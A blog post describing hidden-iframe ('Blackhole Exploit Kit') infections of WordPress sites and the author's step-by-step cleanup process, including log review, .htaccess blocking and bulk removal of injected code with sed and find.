Recently I have seen many posting about the “Blackhole Exploit Kit” and the “Invisible IFrame Attack” on various forums, Antivirus Software Provider websites and various other resources.

Due to my activities in IT Security, I have dealt with this kind of “attack” before, and looking at what has been posted on the sources I saw until now, I would like to mention a few thoughts on this matter.

What is the “Blackhole Exploit Kit”/”Invisible IFrame Attack” and why do I get warnings about it?

Mostly you get a warning by your anti-virus software that tells you that a malicious item was found in the browser cache. The names for this insecurity vary. Out of my experience I can tell that I often found the malicious code to be called “HTML/TwitScroll.B” which basically is telling you a bit more on what is going on than compared to just calling it “Blackhole Exploit Kit”.

Blackhole is a metaphoric way of describing the functionality of this attack. Basically it is in the fewest cases your site that is hosting the malware, however your visitors get “redirected” to a website that is hosting such malware, like if they were getting into the proximity of a black-hole and transported through a vortex to end at a space they did not naturally intend to go to.

Often the blackhole itself is code that is being added to your website. If you had a look at the source code of your website, you would find items that should not be there, in the case of it being reported as “HTML/TwitScroll.B” this often is a hidden Iframe that appears several times in your website code.

The screenshot below shows some example code of an infected website. The destination of the attack has been blurred to avoid abuse of this resource.

As soon as your browser is accessing a website that contains this code, the virus scanner on your system identifies the website to be infected. This is either done by direct interfacing with the browers and the virus scanner having knowledge of the code that is being loaded, or by the fact that the browser sooner or later will try to cache the source code of the website to speed up your future visits, in this case the “live protection” would be triggered.

The aftermath of the attack

I mainly dealt with this issue on wordpress websites. If you inspect such sites you will notice that unwanted code has been added to almost ALL files on your system. For Javascript files (*.js or *.min.js) the attackers are even smart enough to use javascript in order to get their code onto your pages. You could compare this behavior with a virus adding its code to files on your local system, this time it is just happening in a web-server environment.

I would like to point out that the warning you are getting is the AFTERMATH of the attack. The attack itself may have been initiated through different approaches of compromising your server environment. This means that it is vital that you inspect on how the code got there instead of just going to “clean install” your website from a backup you took a bit ago. If you just re-install your website without removing the initial issue it will take a few days and the same issue would re-occur. If it is not the same issue, then the attackers might do other things with your compromised environment.

If you challenge the attackers make sure that you have the proper arms.

I am not going to tell you what precisely to do, I only can give you suggestions on how-to tackle the problem. Web environments never are the same and your server configuration might require different steps than the systems I worked on. However, I can tell you the steps I take.

I leave it up to you if you intend to leave the system online or not. Personally I would suggest you to set it into a maintenance mode, this often is simply done by replacing the index.php/index.html on the server document root which will show users a maintenance information of your choice rather than having them drop on your main page and potentially get virus warnings.

 

1. Take a full backup of the compromised install

You might be thinking that this step is easy. However, I would like to remind you that your virus scanner will not permit you to write any files with the malicious signature to your hard-drive. In order to work efficiently I am using a Linux system for the work on such issues. You can install Linux to a virtual machine or have a dedicated Linux machine running.

To take the backup I FTP into the server, I copy all content on the server to a directory on my system. Usually I document cases for later reports and analysis, so I name the main directory by the case-name / case-id, in there I create a subdirectory called “infected”.

From your anti-virus software you should have been given sufficient information on what to look for. Basically I open one of the files that were reported to be troublesome and check if the iframe (or other code) that I previously saw on the web site source code is present. You now can be sure that your website code has been modified. Still, you do not know what has happened.

 

2. Analyse your log files

There are various tools and websites that permit you to analyse server-logs, this includes FTP access logs as well as http-Server access logs. You might find out how the malicious code has been added, in the case of running WordPress some old plugin/theme code may have been used, if you are running the Hermes theme you might still be using an insecure and outdated “timthumb.php” which REALLY can cause issues.
In some cases you might have updated items that reverted security patches that you made to your code, there are many reasons and I cannot cover them here.

 

3. Lock out the attackers

I have seen many of the attacks to be run from Asian countries or African countries, of course some proxies might be used. However, no matter if through a proxy or not I am a rather radical person on keeping out attackers. If some countries do open doors for attackers and show small efforts to deal with such, I lock out visitors from such areas. I do this through .htaccess deny-rules. If you are working with a customer you should check if they are fine with people getting locked out. On smaller websites you often work with people who do not have any plans to do business with such countries and therefore do not mind having them locked out.

 

4. Eliminate the security issue

Before you do not know the security issue that has let attackers have their fun with your content, it is priceless to repair the site and upload it again. First priority is to remove any security issue, if you are unaware of what might have happened you should seek help. Do not take the fact that your website has gotten hacked too easy, the results that get your attention only are the tip of the iceberg.

If you had a diary as a child imagine you noticed that the little padlock that should keep your secrets save from unwanted readers has been opened violently. You know that somebody has gotten access to your data but you cannot know for sure how far they were reading. The same applies to your website, you know what kind of data you are hosting there, and I know many people that use their web-servers for the storage of more sensitive things than is just visible to the reader of the website.

 

5. Clean the website content

Depending on the system you are running you might either want to do a clean install (keep in mind to check if your security patches are overwritten!) or clean the content from the items that have been added. Most of you would be afraid thinking of a high number of modified files. Depending on the website it could be hundreds of single pages that were modified to contain the hidden iframe code. At this point most anti-virus companies would tell you to purchase their product or use their services online in order to get the items cleaned. This even happens when you are despaired and asking for urgent help. Even if I am looking for work in my sector of IT Security right now, I will not tell you to send me funds to look at your issue. I will be giving you hands on advise from my professional perspective.

When it comes to cleaning the site content you might be thinking of something like “search-and-replace” as it could be done on software like Notepad++ and other text editing applications. This idea is good! However, we have to keep in mind that our windows system is reporting viruses on the files that we need to “clean” and just putting them into quarantine or have them deleted is NOT what we want to go for. I STRONGLY encourage you NOT TO STOP your anti-virus software on the windows system just to clean the website. In the time that you are cleaning the website other malicious items could hit your computer, and with security being switched off more of your data is at a risk.

Remember that I mentioned a Linux system before? There is something like “Search and Replace” available, yet even better it is done on the terminal and works very well. The command we are looking for is “sed”, and we will be combining the command with the “find” command.

First of all you want to duplicate the folder “infected” to a folder called “cleaned”, so that you have the “infected” folder and a “cleaned” folder which both include the very same infected version of your website.

So basically what the command stated below will do is to find all files with the extension *.php, the output of the find command will be used as file input command by sed, so that sed starts to search the file for the string we defined and replaces it by … nothing. This means that we iterate through the content in all directories and sub-directories, look for files with the extension php and then have the iframe code deleted. The same is repeated for all variations of the code that the attacker added.

Once you think that you are through with the cleaning, you can transfer the folder to your windows device or any other computer that is running a virus scanner software. Scan the “cleaned” directory for issues, preferably with a anti-virus software that previously gave you findings on the infected version of code. Out of experience you will still find a few infected files, take a look at them on the Linux system to extract the code the attacker injected, then run the commands again to clean. Repeat this step until your cleaned folder is not being reported to contain malicious files any more.

6. Upload the cleaned content

Congratulations, you have reached the point where all added code should have been removed from your website code. You also fixed the security hole that permitted the attacker to modify your content and you may have taken steps to lock-out certain countries from accessing your website. By now it is the moment of re-uploading your content. Again, please make sure that all relevant security fixes that you have provided are present in the “cleaned” folder, if not please apply them PRIOR to uploading the content to your webserver.

The last step is to check if the website is running as before. You can simply navigate to your website and see if everything is as it was before. Also if you were getting virus warnings before which now are gone, be happy. As a matter of caution you should change passwords as we do not know how much of your data has leaked. You can also use online resources to have your website checked for security issues.

Please note that it takes some days before other online-anti-virus providers will mark your website as not being vulnerable any more. That is nothing you can change, unless the anti-virus providers have a system that lets you ask to re-scan your site.

A few final words…

This is just one approach of tackling an issue. It has proven to be useful and easy and can be used as a standardized approach for removing havoc from your precious web-content. I understand that this approach might not whet the appetite of everyone.

If you are still worried after reading this you can leave me a message at felixtechie@tormail.org and I will see if I can help you or not. You are also welcome to comment on this post. Please note that comments are moderated and will not appear before I approve them.

I do not take any responsibility for damage resulting from following the advise given in this post or other posts on my blog. I am not responsible for damage that resulting from the  usage of third party software or the content on other websites.